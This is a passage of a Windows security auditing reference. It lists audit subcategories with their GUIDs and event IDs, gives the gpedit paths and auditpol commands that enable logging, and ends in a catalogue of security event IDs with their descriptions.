You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-audit-policy-change) #### Authentication Policy Change - Subcategory GUID: `{0CCE9230-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4670 - 4706 - 4707 - 4716 - 4713 - 4717 - 4718 - 4739 - 4864 - 4865 - 4866 - 4867 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Policy Change - Audit Authentication Policy Change - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9230-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9230-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-authentication-policy-change) #### Authorization Policy Change - Subcategory GUID: `{0CCE9231-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Medium to High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4703 - 4704 - 4705 - 4670 - 4911 - 4913 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Policy Change - Audit Authorization Policy Change - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9231-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9231-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-authorization-policy-change) #### Filtering Platform Policy Change - Subcategory GUID: `{0CCE9233-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: TBD - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4709 - 4710 - 4711 - 4712 - 5040 - 5041 - 5042 - 5043 - 5044 - 5045 - 5046 - 5047 - 5048 - 5440 - 5441 - 5442 - 5443 - 5444 - 5446 - 5448 - 5449 - 5450 - 5456 - 5457 - 5458 - 5459 - 5460 - 5461 - 5462 - 5463 - 5464 - 5465 - 5466 - 5467 - 5468 - 5471 - 5472 - 5473 - 5474 - 5477 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Policy Change - Audit Filtering Platform Policy Change - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9233-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9233-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-policy-change) #### MPSSVC Rule-Level Policy Change - Subcategory GUID: `{0CCE9232-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Medium` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4944 - 4945 - 4946 - 4947 - 4948 - 4949 - 4950 - 4951 - 4952 - 4953 - 4954 - 4956 - 4957 - 4958 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Policy Change - Audit MPSSVC Rule-Level Policy Change - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9232-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9232-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-mpssvc-rule-level-policy-change) #### Other Policy Change Events - Subcategory GUID: `{0CCE9234-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Medium to High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4714 - 4819 - 4826 - 4909 - 4910 - 5063 - 5064 - 5065 - 5066 - 5067 - 5068 - 5069 - 5070 - 5447 - 6144 - 6145 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Policy Change - Audit Other Policy Change Events - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9234-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9234-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-policy-change-events) ### Privilege Use #### Non Sensitive Privilege Use - Subcategory GUID: `{0CCE9229-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Very High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4673 - 4674 - 4985 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Privilege Use - Audit Non Sensitive Privilege Use - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9229-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9229-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-non-sensitive-privilege-use) #### Other Privilege Use Events - Subcategory GUID: `{0CCE922A-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: TBD - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4985 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Privilege Use - Audit Other Privilege Use Events - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE922A-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE922A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category.
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-privilege-use-events) #### Sensitive Privilege Use - Subcategory GUID: `{0CCE9228-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4673 - 4674 - 4985 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Privilege Use - Audit Sensitive Privilege Use - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9228-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9228-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category.
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-sensitive-privilege-use) ### System #### IPsec Driver - Subcategory GUID: `{0CCE9213-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Medium` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4960 - 4961 - 4962 - 4963 - 4965 - 5478 - 5479 - 5480 - 5483 - 5484 - 5485 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - System - Audit IPsec Driver - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9213-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9213-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-driver) #### Other System Events - Subcategory GUID: `{0CCE9214-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 5024 - 5025 - 5027 - 5028 - 5029 - 5030 - 5032 - 5033 - 5034 - 5035 - 5037 - 5058 - 5059 - 6400 - 6401 - 6402 - 6403 - 6404 - 6405 - 6406 - 6407 - 6408 - 6409 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - System - Audit Other System Events - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9214-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9214-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-system-events) #### Security State Change - Subcategory GUID: `{0CCE9210-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4608 - 4616 - 4621 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - System - Audit Security State Change - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9210-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9210-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-state-change) #### Security System Extension - Subcategory GUID: `{0CCE9211-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4610 - 4611 - 4614 - 4622 - 4697 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - System - Audit Security System Extension - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9211-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9211-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-system-extension) #### System Integrity - Subcategory GUID: `{0CCE9212-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4612 - 4615 - 4618 - 4816 - 5038 - 5056 - 5062 - 5057 - 5060 - 5061 - 6281 - 6410 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - System - Audit System Integrity - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9212-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9212-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category, you can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-system-integrity) ### Global Object Access Auditing TBD ## Full Event(s) List
Expand Full List - [1100: The event logging service has shut down.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1100) - [1102: The audit log was cleared.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1102) - [1104: The security log is now full.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1104) - [1105: Event log automatic backup.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1105) - [1108: The event logging service encountered an error while processing an incoming event published from %1](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1108) - [4608: Windows is starting up.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4608) - [4610: An authentication package has been loaded by the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4610) - [4611: A trusted logon process has been registered with the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4611) - [4612: Internal resources allocated for the queuing of audit messages have been exhausted, leading to the loss of some audits.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4612) - [4614: A notification package has been loaded by the Security Account Manager.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4614) - [4615: Invalid use of LPC port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4615) - [4616: The system time was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616) - [4618: A monitored security event pattern has 
occurred.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4618) - [4621: Administrator recovered system from CrashOnAuditFail.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4621) - [4622: A security package has been loaded by the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4622) - [4624: An account was successfully logged on.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624) - [4625: An account failed to log on.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625) - [4626: User/Device claims information.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4626) - [4627: Group membership information.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4627) - [4634: An account was logged off.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634) - [4646: Security ID: %1](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4646) - [4647: User initiated logoff.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647) - [4648: A logon was attempted using explicit credentials.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4648) - [4649: A replay attack was detected.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649) - [4650: An IPsec Main Mode security association was established. Extended Mode was not enabled. 
Certificate authentication was not used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4650) - [4651: An IPsec Main Mode security association was established. Extended Mode was not enabled. A certificate was used for authentication.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4651) - [4652: An IPsec Main Mode negotiation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4652) - [4653: An IPsec Main Mode negotiation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4653) - [4655: An IPsec Main Mode security association ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4655) - [4656: A handle to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) - [4657: A registry value was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4657) - [4658: The handle to an object was closed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4658) - [4660: An object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4660) - [4661: A handle to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661) - [4662: An operation was performed on an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662) - [4663: An attempt was made to access an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4663) - [4664: An attempt was made to create a hard link.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4664) - [4665: An attempt was made to create an application client 
context.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4665) - [4666: An application attempted an operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4666) - [4667: An application client context was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4667) - [4668: An application was initialized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4668) - [4670: Permissions on an object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4670) - [4671: An application attempted to access a blocked ordinal through the TBS.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4671) - [4672: Special privileges assigned to new logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672) - [4673: A privileged service was called.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673) - [4674: An operation was attempted on a privileged object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4674) - [4675: SIDs were filtered.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4675) - [4688: A new process has been created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4688) - [4689: A process has exited.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4689) - [4690: An attempt was made to duplicate a handle to an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4690) - [4691: Indirect access to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4691) - [4692: Backup of data protection master key was 
attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4692) - [4693: Recovery of data protection master key was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4693) - [4694: Protection of auditable protected data was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4694) - [4695: Unprotection of auditable protected data was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4695) - [4696: A primary token was assigned to process.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4696) - [4697: A service was installed in the system.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4697) - [4698: A scheduled task was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698) - [4699: A scheduled task was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699) - [4700: A scheduled task was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4700) - [4701: A scheduled task was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701) - [4702: A scheduled task was updated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4702) - [4703: A user right was adjusted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4703) - [4704: A user right was assigned.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4704) - [4705: A user right was 
removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4705) - [4706: A new trust was created to a domain.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706) - [4707: A trust to a domain was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4707) - [4709: IPsec Services was started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4709) - [4710: IPsec Services was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4710) - [4711: May contain any one of the following:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4711) - [4712: IPsec Services encountered a potentially serious failure.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4712) - [4713: Kerberos policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4713) - [4714: Encrypted data recovery policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4714) - [4715: The audit policy (SACL) on an object was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4715) - [4716: Trusted domain information was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4716) - [4717: System security access was granted to an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4717) - [4718: System security access was removed from an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4718) - [4719: System audit policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4719) - [4720: A user account was 
created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720) - [4722: A user account was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4722) - [4723: An attempt was made to change an account's password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4723) - [4724: An attempt was made to reset an account's password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724) - [4725: A user account was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4725) - [4726: A user account was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4726) - [4727: A security-enabled global group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4727) - [4728: A member was added to a security-enabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4728) - [4729: A member was removed from a security-enabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4729) - [4730: A security-enabled global group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4730) - [4731: A security-enabled local group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4731) - [4732: A member was added to a security-enabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4732) - [4733: A member was removed from a security-enabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4733) - [4734: A security-enabled local group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4734) - [4735: A security-enabled local group was 
changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4735) - [4737: A security-enabled global group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4737) - [4738: A user account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738) - [4739: Domain Policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4739) - [4740: A user account was locked out.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4740) - [4741: A computer account was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741) - [4742: A computer account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4742) - [4743: A computer account was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743) - [4744: A security-disabled local group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4744) - [4745: A security-disabled local group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4745) - [4746: A member was added to a security-disabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4746) - [4747: A member was removed from a security-disabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4747) - [4748: A security-disabled local group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4748) - [4749: A security-disabled global group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4749) - [4750: A security-disabled global group was 
changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4750) - [4751: A member was added to a security-disabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4751) - [4752: A member was removed from a security-disabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4752) - [4753: A security-disabled global group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4753) - [4754: A security-enabled universal group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4754) - [4755: A security-enabled universal group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4755) - [4756: A member was added to a security-enabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4756) - [4757: A member was removed from a security-enabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4757) - [4758: A security-enabled universal group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4758) - [4759: A security-disabled universal group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4759) - [4760: A security-disabled universal group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4760) - [4761: A member was added to a security-disabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4761) - [4762: A member was removed from a security-disabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4762) - [4763: A security-disabled universal group was 
deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4763) - [4764: A group's type was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4764) - [4765: SID History was added to an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4765) - [4766: An attempt to add SID History to an account failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4766) - [4767: A user account was unlocked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4767) - [4768: A Kerberos authentication ticket (TGT) was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768) - [4769: A Kerberos service ticket was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4769) - [4770: A Kerberos service ticket was renewed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4770) - [4771: Kerberos pre-authentication failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771) - [4772: A Kerberos authentication ticket request failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4772) - [4773: A Kerberos service ticket request failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4773) - [4774: An account was mapped for logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4774) - [4775: An account could not be mapped for logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4775) - [4776: The computer attempted to validate the credentials for an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776) - [4777: The domain controller failed to validate 
the credentials for an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4777) - [4778: A session was reconnected to a Window Station.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4778) - [4779: A session was disconnected from a Window Station.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4779) - [4780: The ACL was set on accounts which are members of administrators groups.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4780) - [4781: The name of an account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4781) - [4782: The password hash of an account was accessed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4782) - [4783: A basic application group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4783) - [4784: A basic application group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4784) - [4785: A member was added to a basic application 